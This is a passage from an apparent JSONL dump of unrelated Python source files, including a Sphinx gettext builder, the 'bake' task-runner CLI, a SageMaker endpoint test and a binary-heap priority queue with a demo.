\"bootProj.settings\")\n try:\n from django.core.management import execute_from_command_line\n except ImportError as exc:\n raise ImportError(\n \"Couldn't import Django. Are you sure it's installed and \"\n \"available on your PYTHONPATH environment variable? Did you \"\n \"forget to activate a virtual environment?\"\n ) from exc\n execute_from_command_line(sys.argv)\n"} {"ext": "py", "sha": "1a2f5fcebf615e5a0064a633180aae48ca9e6486", "content": "# -*- coding: utf-8 -*-\n\"\"\"\n sphinx.builders.gettext\n ~~~~~~~~~~~~~~~~~~~~~~~\n\n The MessageCatalogBuilder class.\n\n :copyright: Copyright 2007-2015 by the Sphinx team, see AUTHORS.\n :license: BSD, see LICENSE for details.\n\"\"\"\n\nfrom __future__ import unicode_literals\n\nfrom os import path, walk\nfrom codecs import open\nfrom time import time\nfrom datetime import datetime, tzinfo, timedelta\nfrom collections import defaultdict\nfrom uuid import uuid4\n\nfrom six import iteritems\n\nfrom sphinx.builders import Builder\nfrom sphinx.util import split_index_msg\nfrom sphinx.util.nodes import extract_messages, traverse_translatable_index\nfrom sphinx.util.osutil import safe_relpath, ensuredir, find_catalog, SEP\nfrom sphinx.util.console import darkgreen, purple, bold\nfrom sphinx.locale import pairindextypes\n\nPOHEADER = r\"\"\"\n# SOME DESCRIPTIVE TITLE.\n# Copyright (C) %(copyright)s\n# This file is distributed under the same license as the %(project)s package.\n# FIRST AUTHOR , YEAR.\n#\n#, fuzzy\nmsgid \"\"\nmsgstr \"\"\n\"Project-Id-Version: %(project)s %(version)s\\n\"\n\"Report-Msgid-Bugs-To: \\n\"\n\"POT-Creation-Date: %(ctime)s\\n\"\n\"PO-Revision-Date: YEAR-MO-DA HO:MI+ZONE\\n\"\n\"Last-Translator: FULL NAME \\n\"\n\"Language-Team: LANGUAGE \\n\"\n\"MIME-Version: 1.0\\n\"\n\"Content-Type: text/plain; charset=UTF-8\\n\"\n\"Content-Transfer-Encoding: 8bit\\n\"\n\n\"\"\"[1:]\n\n\nclass Catalog(object):\n \"\"\"Catalog of translatable messages.\"\"\"\n\n def __init__(self):\n self.messages = [] # retain insertion order, a la OrderedDict\n self.metadata = {} # msgid -> file, line, uid\n\n def add(self, msg, origin):\n if not hasattr(origin, 'uid'):\n # Nodes that are replicated like todo don't have a uid,\n # however i18n is also unnecessary.\n return\n if msg not in self.metadata: # faster lookup in hash\n self.messages.append(msg)\n self.metadata[msg] = []\n self.metadata[msg].append((origin.source, origin.line, origin.uid))\n\n\nclass MsgOrigin(object):\n \"\"\"\n Origin holder for Catalog message origin.\n \"\"\"\n\n def __init__(self, source, line):\n self.source = source\n self.line = line\n self.uid = uuid4().hex\n\n\nclass I18nBuilder(Builder):\n \"\"\"\n General i18n builder.\n \"\"\"\n name = 'i18n'\n versioning_method = 'text'\n versioning_compare = None # be set by `gettext_uuid`\n\n def __init__(self, app):\n self.versioning_compare = app.env.config.gettext_uuid\n super(I18nBuilder, self).__init__(app)\n\n def init(self):\n Builder.init(self)\n self.catalogs = defaultdict(Catalog)\n\n def get_target_uri(self, docname, typ=None):\n return ''\n\n def get_outdated_docs(self):\n return self.env.found_docs\n\n def prepare_writing(self, docnames):\n return\n\n def compile_catalogs(self, catalogs, message):\n return\n\n def write_doc(self, docname, doctree):\n catalog = self.catalogs[find_catalog(docname,\n self.config.gettext_compact)]\n\n for node, msg in extract_messages(doctree):\n catalog.add(msg, node)\n\n if 'index' in self.env.config.gettext_enables:\n # Extract translatable messages from index entries.\n for node, entries in traverse_translatable_index(doctree):\n for typ, msg, tid, main in entries:\n for m in split_index_msg(typ, msg):\n if typ == 'pair' and m in pairindextypes.values():\n # avoid built-in translated message was incorporated\n # in 'sphinx.util.nodes.process_index_entry'\n continue\n catalog.add(m, node)\n\n\n# determine tzoffset once to remain unaffected by DST change during build\ntimestamp = time()\ntzdelta = datetime.fromtimestamp(timestamp) - \\\n datetime.utcfromtimestamp(timestamp)\n\nclass LocalTimeZone(tzinfo):\n\n def __init__(self, *args, **kw):\n super(LocalTimeZone, self).__init__(*args, **kw)\n self.tzdelta = tzdelta\n\n def utcoffset(self, dt):\n return self.tzdelta\n\n def dst(self, dt):\n return timedelta(0)\n\nltz = LocalTimeZone()\n\n\nclass MessageCatalogBuilder(I18nBuilder):\n \"\"\"\n Builds gettext-style message catalogs (.pot files).\n \"\"\"\n name = 'gettext'\n\n def init(self):\n I18nBuilder.init(self)\n self.create_template_bridge()\n self.templates.init(self)\n\n def _collect_templates(self):\n template_files = set()\n for template_path in self.config.templates_path:\n tmpl_abs_path = path.join(self.app.srcdir, template_path)\n for dirpath, dirs, files in walk(tmpl_abs_path):\n for fn in files:\n if fn.endswith('.html'):\n filename = path.join(dirpath, fn)\n filename = filename.replace(path.sep, SEP)\n template_files.add(filename)\n return template_files\n\n def _extract_from_template(self):\n files = self._collect_templates()\n self.info(bold('building [%s]: ' % self.name), nonl=1)\n self.info('targets for %d template files' % len(files))\n\n extract_translations = self.templates.environment.extract_translations\n\n for template in self.app.status_iterator(\n files, 'reading templates... ', purple, len(files)):\n with open(template, 'r', encoding='utf-8') as f:\n context = f.read()\n for line, meth, msg in extract_translations(context):\n origin = MsgOrigin(template, line)\n self.catalogs['sphinx'].add(msg, origin)\n\n def build(self, docnames, summary=None, method='update'):\n self._extract_from_template()\n I18nBuilder.build(self, docnames, summary, method)\n\n def finish(self):\n I18nBuilder.finish(self)\n data = dict(\n version = self.config.version,\n copyright = self.config.copyright,\n project = self.config.project,\n ctime = datetime.fromtimestamp(\n timestamp, ltz).strftime('%Y-%m-%d %H:%M%z'),\n )\n for textdomain, catalog in self.app.status_iterator(\n iteritems(self.catalogs), \"writing message catalogs... \",\n darkgreen, len(self.catalogs),\n lambda textdomain__: textdomain__[0]):\n # noop if config.gettext_compact is set\n ensuredir(path.join(self.outdir, path.dirname(textdomain)))\n\n pofn = path.join(self.outdir, textdomain + '.pot')\n pofile = open(pofn, 'w', encoding='utf-8')\n try:\n pofile.write(POHEADER % data)\n\n for message in catalog.messages:\n positions = catalog.metadata[message]\n\n if self.config.gettext_location:\n # generate \"#: file1:line1\\n#: file2:line2 ...\"\n pofile.write(\"#: %s\\n\" % \"\\n#: \".join(\"%s:%s\" %\n (safe_relpath(source, self.outdir), line)\n for source, line, _ in positions))\n if self.config.gettext_uuid:\n # generate \"# uuid1\\n# uuid2\\n ...\"\n pofile.write(\"# %s\\n\" % \"\\n# \".join(\n uid for _, _, uid in positions))\n\n # message contains *one* line of text ready for translation\n message = message.replace('\\\\', r'\\\\'). \\\n replace('\"', r'\\\"'). \\\n replace('\\n', '\\\\n\"\\n\"')\n pofile.write('msgid \"%s\"\\nmsgstr \"\"\\n\\n' % message)\n\n finally:\n pofile.close()\n"} {"ext": "py", "sha": "1a2f5fe5fbbe5ca306f72443569c2a9f39d15f63", "content": "import json\nfrom pathlib import Path\nfrom typing import List, Optional\n\n\nclass ConfJSON:\n def __init__(self, dir_path: Path, name: str, prefix: str):\n self._dir_path = dir_path\n self.name = f'{prefix.rstrip(\"-\")}-{name}'\n self._file_path = dir_path / name\n self.path = str(self._file_path)\n self.write_json()\n\n def write_json(\n self,\n tests: Optional[List[str]] = None,\n skipped_tests: Optional[List[str]] = None,\n skipped_integrations: Optional[List[str]] = None,\n nightly_integrations: Optional[List[str]] = None,\n unmockable_integrations: Optional[List[str]] = None,\n docker_thresholds: Optional[dict] = None\n ):\n if tests is None:\n tests = []\n if skipped_tests is None:\n skipped_tests = None\n if skipped_integrations is None:\n skipped_integrations = []\n if nightly_integrations is None:\n nightly_integrations = []\n if unmockable_integrations is None:\n unmockable_integrations = []\n if docker_thresholds is None:\n docker_thresholds = {}\n self._file_path.write_text(json.dumps({\n 'tests': tests,\n 'skipped_tests': skipped_tests,\n 'skipped_integrations': skipped_integrations,\n 'nightly_integrations': nightly_integrations,\n 'unmockable_integrations': unmockable_integrations,\n 'docker_thresholds': docker_thresholds\n }))\n"} {"ext": "py", "sha": "1a2f60261566d276f5c5ef5e24872b2879b4b4a5", "content": "#!/usr/bin/env python3\n# Copyright (c) 2018-2020 The Wflscoin Core developers\n# Distributed under the MIT software license, see the accompanying\n# file COPYING or http://www.opensource.org/licenses/mit-license.php.\n\"\"\"Verify that starting wflscoin with -h works as expected.\"\"\"\n\nfrom test_framework.test_framework import WflscoinTestFramework\nfrom test_framework.util import assert_equal\n\nclass HelpTest(WflscoinTestFramework):\n def set_test_params(self):\n self.setup_clean_chain = True\n self.num_nodes = 1\n\n def setup_network(self):\n self.add_nodes(self.num_nodes)\n # Don't start the node\n\n def get_node_output(self, *, ret_code_expected):\n ret_code = self.nodes[0].process.wait(timeout=60)\n assert_equal(ret_code, ret_code_expected)\n self.nodes[0].stdout.seek(0)\n self.nodes[0].stderr.seek(0)\n out = self.nodes[0].stdout.read()\n err = self.nodes[0].stderr.read()\n self.nodes[0].stdout.close()\n self.nodes[0].stderr.close()\n\n # Clean up TestNode state\n self.nodes[0].running = False\n self.nodes[0].process = None\n self.nodes[0].rpc_connected = False\n self.nodes[0].rpc = None\n\n return out, err\n\n def run_test(self):\n self.log.info(\"Start wflscoin with -h for help text\")\n self.nodes[0].start(extra_args=['-h'])\n # Node should exit immediately and output help to stdout.\n output, _ = self.get_node_output(ret_code_expected=0)\n assert b'Options' in output\n self.log.info(\"Help text received: {} (...)\".format(output[0:60]))\n\n self.log.info(\"Start wflscoin with -version for version information\")\n self.nodes[0].start(extra_args=['-version'])\n # Node should exit immediately and output version to stdout.\n output, _ = self.get_node_output(ret_code_expected=0)\n assert b'version' in output\n self.log.info(\"Version text received: {} (...)\".format(output[0:60]))\n\n # Test that arguments not in the help results in an error\n self.log.info(\"Start wflscoind with -fakearg to make sure it does not start\")\n self.nodes[0].start(extra_args=['-fakearg'])\n # Node should exit immediately and output an error to stderr\n _, output = self.get_node_output(ret_code_expected=1)\n assert b'Error parsing command line arguments' in output\n self.log.info(\"Error message received: {} (...)\".format(output[0:60]))\n\n\nif __name__ == '__main__':\n HelpTest().main()\n"} {"ext": "py", "sha": "1a2f605bcd11fe30ea2f2421b0d5b8ff8242ff8a", "content": "import sys\nimport click\nimport json\nimport random\n\nfrom .bakefile import Bakefile, TaskFilter\nfrom .exceptions import NoBakefileFound\nfrom .clint import eng_join\n\nimport pygments\nimport pygments.lexers\nimport pygments.formatters\n\nfrom .constants import SKIP_NEXT, SAFE_ENVIRONS\n\n\ndef indent(line):\n return f'{\" \" * 4}{line}'\n\n\ndef do_help(exit=0):\n with click.Context(entrypoint) as ctx:\n help = entrypoint.get_help(ctx)\n help = help.replace(\n \" bake\",\n str(click.style(\" $ \", fg=\"green\", bold=True))\n + str(click.style(\"bake\", fg=\"yellow\", bold=True)),\n )\n help = help.replace(\n \"the strangely familiar task–runner\",\n str(\n click.style(\"the strangely familiar task–runner\", fg=\"white\", bold=True)\n ),\n )\n help = help.replace(\n \"Options\", str(click.style(\"Options\", fg=\"white\", bold=True))\n )\n\n help = help.replace(\n \"--insecure\", str(click.style(\"--insecure\", fg=\"red\", bold=True))\n )\n help = help.replace(\"--yes\", str(click.style(\"--yes\", fg=\"red\", bold=True)))\n help = help.replace(\n \"--allow\", str(click.style(\"--allow\", fg=\"green\", bold=True))\n )\n help = help.replace(\n \"--no-deps\", str(click.style(\"--no-deps\", fg=\"yellow\", bold=True))\n )\n help = help.replace(\n \"--continue\", str(click.style(\"--continue\", fg=\"red\", bold=True))\n )\n help = help.replace(\n \"--environ-json\", str(click.style(\"--environ-json\", fg=\"green\", bold=True))\n )\n help = help.replace(\"-e,\", str(click.style(\"-e\", fg=\"green\", bold=True) + \",\"))\n\n click.echo(help, err=True)\n sys.exit(exit)\n\n\ndef echo_json(obj):\n _json = json.dumps(obj, indent=2)\n\n if sys.stdin.isatty():\n _json = pygments.highlight(\n _json, pygments.lexers.JsonLexer(), pygments.formatters.TerminalFormatter()\n )\n\n click.echo(_json, err=False)\n\n\n@click.command(context_settings=dict(help_option_names=[\"-h\", \"--help\"]))\n@click.argument(\n \"task\",\n type=click.STRING,\n default=\"__LIST_ALL__\",\n envvar=\"BAKE_TASK\",\n # required=False,\n)\n@click.option(\n \"--bakefile\",\n \"-b\",\n default=\"__BAKEFILE__\",\n envvar=\"BAKEFILE_PATH\",\n nargs=1,\n type=click.Path(),\n help=\"The Bakefile to use.\",\n)\n@click.option(\n \"--list\",\n \"_list\",\n default=False,\n is_flag=True,\n help=\"Lists available tasks (and their dependencies).\",\n)\n@click.option(\n \"--levels\",\n \"-l\",\n default=None,\n nargs=1,\n type=click.INT,\n help=\"List only a given number of '/' levels of tasks.\",\n)\n@click.option(\n \"--help\", \"-h\", default=False, is_flag=True, help=\"Show this message and exit.\"\n)\n@click.option(\"--debug\", default=False, is_flag=True, hidden=True)\n@click.option(\"--source\", default=False, nargs=1, hidden=True)\n@click.option(\n \"--allow\",\n default=False,\n nargs=1,\n multiple=True,\n hidden=False,\n help=\"Whitelist an environment variable for use.\",\n)\n@click.option(\n \"--no-deps\",\n default=False,\n is_flag=True,\n hidden=False,\n help=\"Do not run dependent tasks.\",\n)\n@click.option(\"--yes\", is_flag=True, help=\"Set medium–security prompts to yes.\")\n@click.option(\n \"--continue\",\n \"_continue\",\n is_flag=True,\n # type=click.BOOL,\n help=\"Continue, if a task fails.\",\n)\n@click.option(\n \"--interactive\",\n \"-i\",\n is_flag=True,\n # type=click.BOOL,\n help=\"Run in interactive mode.\",\n)\n@click.option(\n \"--insecure\",\n is_flag=True,\n # type=click.BOOL,\n help=\"Inherit parent shell's environment variables.\",\n)\n@click.argument(\"arguments\", nargs=-1, type=click.STRING)\n@click.option(\n \"--silent\",\n \"-s\",\n is_flag=True,\n # type=click.BOOL,\n help=\"Reduce output.\",\n envvar=\"BAKE_SILENT\",\n)\n@click.option(\n \"--sort\", is_flag=True, type=click.BOOL, help=\"Sort tasks, alphabetially.\"\n)\n@click.option(\n \"--environ-json\",\n \"-e\",\n nargs=1,\n type=click.STRING,\n help=\"Provide environment variables via JSON.\",\n)\n@click.option(\n \"--json\",\n \"-j\",\n \"_json\",\n is_flag=True,\n # type=click.BOOL,\n help=\"Output in JSON format (stdout).\",\n)\ndef entrypoint(\n *,\n task,\n bakefile,\n arguments,\n _list,\n levels,\n _continue,\n environ_json,\n debug,\n silent,\n sort,\n insecure,\n allow,\n _json,\n no_deps,\n interactive,\n yes,\n help,\n source,\n):\n \"\"\"bake — the strangely familiar task–runner.\"\"\"\n\n if help:\n do_help(0)\n\n # Default to list behavior, when no task is provided.\n if _json or source:\n silent = True\n\n # Allow explicitly–passed environment variables.\n SAFE_ENVIRONS.extend(allow)\n\n # Enable list functionality, by default.\n if task == \"__LIST_ALL__\":\n _list = True\n task = None\n\n # Establish the Bakefile.\n try:\n if bakefile == \"__BAKEFILE__\":\n bakefile = Bakefile.find(root=\".\", filename=\"Bakefile\")\n else:\n bakefile = Bakefile(path=bakefile)\n\n except NoBakefileFound:\n click.echo(click.style(\"No Bakefile found!\", fg=\"red\"), err=True)\n do_help(1)\n sys.exit(0)\n\n if debug:\n click.echo(f\" + Bakefile: {bakefile.path}\", err=True)\n\n # --source (internal API)\n if source:\n\n def echo_generator(g):\n for g in g:\n click.echo(g)\n\n if source == \"__init__\":\n source = random.choice(list(bakefile.tasks.keys()))\n task = bakefile.tasks[source]\n source = task.gen_source(\n sources=[task.bashfile.funcs_source, task.bashfile.root_source]\n )\n else:\n task = bakefile.tasks[source]\n source = task.gen_source(\n sources=[\n task.bashfile.funcs_source,\n task.bashfile.root_source,\n task.source,\n ]\n )\n\n for source_line in source:\n click.echo(source_line)\n sys.exit(0)\n\n if not insecure:\n for key in bakefile.environ:\n if key not in SAFE_ENVIRONS:\n del bakefile.environ[key]\n\n if environ_json:\n bakefile.add_environ_json(environ_json)\n\n argv = []\n environ = []\n\n for i, argument in enumerate(arguments[:]):\n if \"=\" in argument:\n key, value = argument.split(\"=\", 1)\n environ.append((key, value))\n else:\n argv.append(argument)\n\n if debug:\n click.echo(f\" + argv: {argv!r}\", err=True)\n click.echo(f\" + environ: {environ!r}\", err=True)\n click.echo(err=True)\n for env in environ:\n key, value = env\n if debug:\n click.echo(\n f\" + Setting environ: {click.style(key, fg='red')} {click.style('=', fg='white')} {value}.\",\n err=True,\n )\n bakefile.add_environ(key, value)\n\n bakefile.add_args(*argv)\n\n if _list:\n __list_json = {\"tasks\": {}}\n\n # Enable level filtering.\n if levels is not None:\n task_list = []\n for _task in bakefile.tasks:\n if len(_task.split(\"/\")) <= levels:\n task_list.append(_task)\n else:\n task_list = bakefile.tasks\n\n if sort:\n task_list = sorted(task_list)\n\n for _task in task_list:\n depends_on = bakefile[_task].depends_on(\n include_filters=False, recursive=True\n )\n\n if no_deps:\n depends_on = ()\n\n if depends_on:\n deps = [str(a) for a in depends_on]\n deps = f\"\\n {click.style('+', fg='yellow', bold=True)} {eng_join(deps, conj='&')}.\"\n else:\n deps = \"\"\n colon = \"\" if not deps else \"…\"\n\n __list_json[\"tasks\"].update(\n {_task: {\"depends_on\": [str(d) for d in depends_on]}}\n )\n\n if not silent:\n click.echo(\n f\" {click.style('-', fg='green', bold=True)} {click.style(_task, bold=True)}{colon}{deps}\",\n err=False,\n )\n\n if not silent:\n tasks_unechoed = len(bakefile.tasks) - len(task_list)\n\n if tasks_unechoed:\n bake_command = str(click.style(f\"bake --levels {levels + 1}\", fg=\"red\"))\n click.echo(\n f\"Note: {tasks_unechoed} more tasks are available. \"\n f\"Please use $ {bake_command} to see more.\",\n err=True,\n )\n\n if _json:\n echo_json(__list_json)\n\n sys.exit(0)\n\n if task:\n try:\n task = bakefile[task]\n except KeyError:\n click.echo(click.style(f\"Task {task} does not exist!\", fg=\"red\"))\n sys.exit(1)\n\n def execute_task(task, *, silent=False):\n try:\n edges = list(bakefile.graph.out_edges(task))[0]\n except IndexError:\n edges = list()\n\n skips = []\n for edge in edges:\n if edge.do_skip is not None:\n skips.append(edge.do_skip)\n\n if not all(skips or [False]):\n # TODO: fully implement this?\n if \"@\" in f\"{task}\":\n silent = True\n\n if not silent:\n click.echo(\n click.style(\" + \", fg=\"white\")\n + click.style(f\"Executing {task}\", fg=\"yellow\")\n + click.style(\":\", fg=\"white\"),\n err=True,\n )\n usually_bash_task = task.execute(\n yes=yes, debug=debug, silent=silent, interactive=interactive\n )\n\n if not _continue:\n if hasattr(usually_bash_task, \"ok\"):\n\n if usually_bash_task.return_code > 0:\n if not silent:\n click.echo(\n click.style(f\"Task {task} failed!\", fg=\"red\"),\n err=True,\n )\n sys.exit(usually_bash_task.return_code)\n\n # This happens when it's a task filter.\n elif isinstance(usually_bash_task, tuple):\n key, value = (\n usually_bash_task\n ) # But, in this instance, clearly isn't.\n else:\n click.echo(\n click.style(\" + \", fg=\"green\")\n + click.style(f\"Skipping {task}\", fg=\"white\")\n + click.style(\".\", fg=\"white\"),\n err=True,\n )\n\n if not no_deps:\n tasks = task.depends_on(recursive=True) + [task]\n\n else:\n tasks = [task]\n\n for task in tasks:\n execute_task(task, silent=silent)\n\n if not silent:\n click.echo(\n click.style(\" + \", fg=\"white\")\n + click.style(\"Done\", fg=\"green\")\n + click.style(\".\", fg=\"white\"),\n err=True,\n )\n sys.exit(0)\n\n\nif __name__ == \"__main__\":\n entrypoint()\n"} {"ext": "py", "sha": "1a2f608c401acef3ba3d11f0434bb677bdceb6bc", "content": "#!/usr/bin/python3\n\nARD_DEVICE_ID = \"1\"\n\nADC_READ_INTERVAL = 0.1\nADC_KEEP_VALS = 20\nLIGHT_KEEP_VALS = 20\n\nLOGFILE = \"./logs/smarthome.log\"\n\n# --- Unicodes --- #\nHOME = ' ⌂'\nHOMEON = ' ☗'\nKEY = ' ⚿'\nCLOUD = ' ☁'\nSTAR = ' ★'\nSUN = ' ☀'\nREFRESH = ' 🗘'\nCHECKED = ' ✔'\nPOINT = ' ☛'\nMISSING = ' ✘'\nMODESSYMBOL = ' ❖'\nMENUSYMBOL = ' ☰'\nTERMOMETER = ' 🌡'\nMUSIC = ' ♫'\nEMAIL = ' ✉'\nNOTIFICATION = ' 🔔'\nDEGREES = ' °C'\nSMILE = ' ☺'\nMOON = ' ☾'\nQUATER_MOON = '☽'\nPEACE = ' ☮'\n\n# --- Modes --- #\n\nLIGHT_TRESHOLD = 400\n\n"} {"ext": "py", "sha": "1a2f60af2272be77ef975238d91156b2983a193a", "content": "# the required python libraries imported\nimport pandas as pd\nimport matplotlib\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom trcrpm import TRCRP_Mixture\nfrom collections import Counter\nprint \"fuck yeah\"\ndata = pd.read_csv(\"./data/anomaly0245.csv\", index_col=0)\ndata = data.iloc[156600:240000].reset_index(drop=True)\n\n# Setup the placekeeping and initilizing variables\nchain = 0\nx, eng_val, states, num_states = [], [], [], []\ni = 0\nstep = 30\nprint(i)\n\nrng = np.random.RandomState(1)\nmodel = TRCRP_Mixture(chains=1, lag=10, variables=data.columns, rng=rng)\nmodel.incorporate(data[i:i + step])\nmodel.resample_all(seconds=10)\nmodel.resample_hyperparameters(seconds=10)\ns = model.get_temporal_regimes('anomaly')[chain]\nnum_states = step * [len(sorted(set(s)))]\nstates = list(s[i:i + step])\neng_val = data.iloc[i:i + step, 0].tolist()\nx = list(range(i, i + step ))\n\nfor i in range(step, len(data) - step, step):\n model.incorporate(data[i:i + step])\n model.resample_all(seconds=10)\n model.resample_hyperparameters(seconds=10)\n s = model.get_temporal_regimes(\"anomaly\")[chain]\n num_states = step * [len(sorted(set(s)))]\n states = list(s[i:i + step])\n eng_val = data.iloc[i:i + step, 0].tolist()\n x = list(range(i, i + step ))\n print(i)"} {"ext": "py", "sha": "1a2f60bade4f75181ad28d3e096599995bccdd46", "content": "import pytest\nimport os\nimport utils\nimport io\nimport numpy\nimport json\nimport pickle\nimport gzip\n\nfrom utils import kfp_client_utils\nfrom utils import minio_utils\nfrom utils import sagemaker_utils\n\n\ndef run_predict_mnist(boto3_session, endpoint_name, download_dir):\n \"\"\" https://github.com/awslabs/amazon-sagemaker-examples/blob/a8c20eeb72dc7d3e94aaaf28be5bf7d7cd5695cb\n /sagemaker-python-sdk/1P_kmeans_lowlevel/kmeans_mnist_lowlevel.ipynb \"\"\"\n # Download and load dataset\n region = boto3_session.region_name\n download_path = os.path.join(download_dir, \"mnist.pkl.gz\")\n boto3_session.resource(\"s3\", region_name=region).Bucket(\n \"sagemaker-sample-data-{}\".format(region)\n ).download_file(\"algorithms/kmeans/mnist/mnist.pkl.gz\", download_path)\n with gzip.open(download_path, \"rb\") as f:\n train_set, valid_set, test_set = pickle.load(f, encoding=\"latin1\")\n\n # Function to create a csv from numpy array\n def np2csv(arr):\n csv = io.BytesIO()\n numpy.savetxt(csv, arr, delimiter=\",\", fmt=\"%g\")\n return csv.getvalue().decode().rstrip()\n\n # Run prediction on an image\n runtime = boto3_session.client(\"sagemaker-runtime\")\n payload = np2csv(train_set[0][30:31])\n\n response = runtime.invoke_endpoint(\n EndpointName=endpoint_name, ContentType=\"text/csv\", Body=payload,\n )\n return json.loads(response[\"Body\"].read().decode())\n\n\n@pytest.mark.parametrize(\n \"test_file_dir\",\n [\n pytest.param(\n \"resources/config/kmeans-mnist-endpoint\", marks=pytest.mark.canary_test\n )\n ],\n)\ndef test_create_endpoint(\n kfp_client, experiment_id, boto3_session, sagemaker_client, test_file_dir\n):\n\n download_dir = utils.mkdir(os.path.join(test_file_dir + \"/generated\"))\n test_params = utils.load_params(\n utils.replace_placeholders(\n os.path.join(test_file_dir, \"config.yaml\"),\n os.path.join(download_dir, \"config.yaml\"),\n )\n )\n\n # Generate random prefix for model, endpoint config and endpoint name\n # to avoid errors if resources with same name exists\n test_params[\"Arguments\"][\"model_name\"] = test_params[\"Arguments\"][\n \"endpoint_config_name\"\n ] = test_params[\"Arguments\"][\"endpoint_name\"] = input_endpoint_name = (\n utils.generate_random_string(5) + \"-\" + test_params[\"Arguments\"][\"model_name\"]\n )\n print(f\"running test with model/endpoint name: {input_endpoint_name}\")\n\n _, _, workflow_json = kfp_client_utils.compile_run_monitor_pipeline(\n kfp_client,\n experiment_id,\n test_params[\"PipelineDefinition\"],\n test_params[\"Arguments\"],\n download_dir,\n test_params[\"TestName\"],\n test_params[\"Timeout\"],\n )\n\n try:\n outputs = {\"sagemaker-deploy-model\": [\"endpoint_name\"]}\n\n output_files = minio_utils.artifact_download_iterator(\n workflow_json, outputs, download_dir\n )\n\n output_endpoint_name = utils.read_from_file_in_tar(\n output_files[\"sagemaker-deploy-model\"][\"endpoint_name\"]\n )\n print(f\"endpoint name: {output_endpoint_name}\")\n\n # Verify output from pipeline is endpoint name\n assert output_endpoint_name == input_endpoint_name\n\n # Verify endpoint is running\n assert (\n sagemaker_utils.describe_endpoint(sagemaker_client, input_endpoint_name)[\n \"EndpointStatus\"\n ]\n == \"InService\"\n )\n\n # Validate the model for use by running a prediction\n result = run_predict_mnist(boto3_session, input_endpoint_name, download_dir)\n print(f\"prediction result: {result}\")\n assert json.dumps(result, sort_keys=True) == json.dumps(\n test_params[\"ExpectedPrediction\"], sort_keys=True\n )\n utils.remove_dir(download_dir)\n finally:\n # delete endpoint\n sagemaker_utils.delete_endpoint(sagemaker_client, input_endpoint_name)\n"} {"ext": "py", "sha": "1a2f616e58fa30c08acda8dc2317540f88f15600", "content": "# proxy module\nfrom pyface.ui.wx.grid.trait_grid_cell_adapter import *\n"} {"ext": "py", "sha": "1a2f62375f668ee9479eedce51823352feb3e903", "content": "default_app_config = 'sandbox.order.apps.OrderConfig'\n"} {"ext": "py", "sha": "1a2f628c8110b8d4f0d62d7b9055720ae4baad17", "content": "import random\n\nclass PriQ(object):\n '''Binary-Heap based Priority Queue with uniquely named elements, name may \\\nbe any hashable type. Defaults to min-heap, set maxpq=True for max-heap. \\\nPublic methods: put, get, remove, update, contains, front, get_priority.'''\n \n def __init__(self, maxpq = False):\n self.q =[] # The priority queue, contains (priority, name) tuples\n self.elements = {} # Dict of all elements currently in queue, with current index\n self.maxmod = -1 if maxpq else 1 # modify pq to max instead of min\n\n def __len__(self):\n return len(self.q)\n \n def __str__(self):\n return str(self.q)\n\n def _propUp(self, index):\n '''Propagate up element to proper place in binary heap'''\n current = index\n while current > 0:\n parent = (current - 1) // 2 # parent node\n # swap with parent until parent <= child (>= for maxPQ)\n if self.q[parent][0] * self.maxmod <= self.q[current][0] * self.maxmod:\n break\n self.elements[self.q[current][1]], self.elements[self.q[parent][1]] = parent, current\n self.q[parent], self.q[current] = self.q[current], self.q[parent]\n current = parent\n\n def _propDown(self, index):\n '''Propagate down element to proper place in binary heap'''\n if len(self.q) == 1:\n self.elements[self.q[0][1]] = 0 # update index of last element\n current = index\n while current * 2 + 1 < len(self.q): # node has a child\n left, right = current * 2 + 1, current * 2 + 2\n if right == len(self.q): # left child only\n if self.q[current][0] * self.maxmod >= self.q[left][0] * self.maxmod:\n # swap with left child and update elements dict\n self.elements[self.q[current][1]], self.elements[self.q[left][1]] = left, current\n self.q[current], self.q[left] = self.q[left], self.q[current]\n break\n if self.maxmod == 1: # min PQ\n minChild = left if self.q[left] <= self.q[right] else right\n if self.q[current] <= self.q[minChild]: # swap with lowest priority child as needed\n break\n self.elements[self.q[current][1]], self.elements[self.q[minChild][1]] = minChild, current\n self.q[current], self.q[minChild] = self.q[minChild], self.q[current]\n current = minChild\n else: # max PQ\n maxChild = left if self.q[left] >= self.q[right] else right\n if self.q[current] >= self.q[maxChild]: # swap with highest priority child as needed\n break\n self.elements[self.q[current][1]], self.elements[self.q[maxChild][1]] = maxChild, current\n self.q[current], self.q[maxChild] = self.q[maxChild], self.q[current]\n current = maxChild\n\n def put(self, name, priority):\n '''Add named element to priorty queue and place in binary heap'''\n if self.contains(name): return ValueError(name)\n self.q.append((priority, name))\n self.elements[name] = len(self.q) - 1\n self._propUp(self.elements[name])\n\n def front(self):\n '''Element at front of queue'''\n return self.q[0]\n\n def get_priority(self, name):\n '''Current priority of named element'''\n return self.q[self.elements[name]][0]\n\n def get(self):\n '''Return element at front of queue and re-heapify queue'''\n if not self.q: \n return False # empty queue\n result = self.q[0]\n del(self.elements[result[1]])\n if len(self.q) > 1:\n self.q[0] = self.q.pop()\n self._propDown(0)\n else:\n self.q = []\n self.elements = {}\n return result\n\n def update(self, name, priority):\n '''Change priority of named element and re-heapify'''\n if not self.contains(name): return ValueError(name)\n index = self.elements[name]\n old_priority = self.q[index][0]\n self.q[index] = (priority, name)\n if priority * self.maxmod < old_priority * self.maxmod:\n self._propUp(index)\n if priority * self.maxmod > old_priority * self.maxmod:\n self._propDown(index)\n\n def contains(self, name):\n '''True if name currently exists in the queue'''\n return (name in self.elements)\n\n def remove(self, name):\n '''Remove named element and re-heapify'''\n if not self.contains(name): return ValueError(name)\n index = self.elements[name]\n old_priority = self.q[index][0]\n del(self.elements[name])\n if len(self.q) > 1:\n self.q[index] = self.q.pop() # replace with last item in queue\n self.elements[self.q[index][1]] = index\n # re-heapify\n if self.q[index][0] * self.maxmod < old_priority * self.maxmod:\n self._propUp(index) \n elif self.q[index][0] * self.maxmod > old_priority * self.maxmod:\n self._propDown(index)\n else:\n self.q = []\n\n###############################################################################\n# Following are examples, including Dijkstra's shortest path\n###############################################################################\n\nif __name__ == \"__main__\":\n # Sequential letter names with random integer weights (demonstration)\n pq = PriQ()\n name = 'a'\n for _ in range(26):\n pq.put(name, random.randint(1,99))\n name = chr(ord(name) + 1)\n print(\"Initial: ['a'-'z' = randint(1,99)]\\n\", pq, \"\\nLength: \", len(pq))\n print(\"Priority of 'a':\", pq.get_priority('a'))\n print(\"Front:\", pq.front())\n pq.put('a', 17) # testing for duplicate put\n pq.update('a', 1)\n pq.update('b', 99)\n print(\"After updating 'a' to 1 and 'b' to 99:\\n\", pq)\n pq.remove('c')\n print(\"After removing 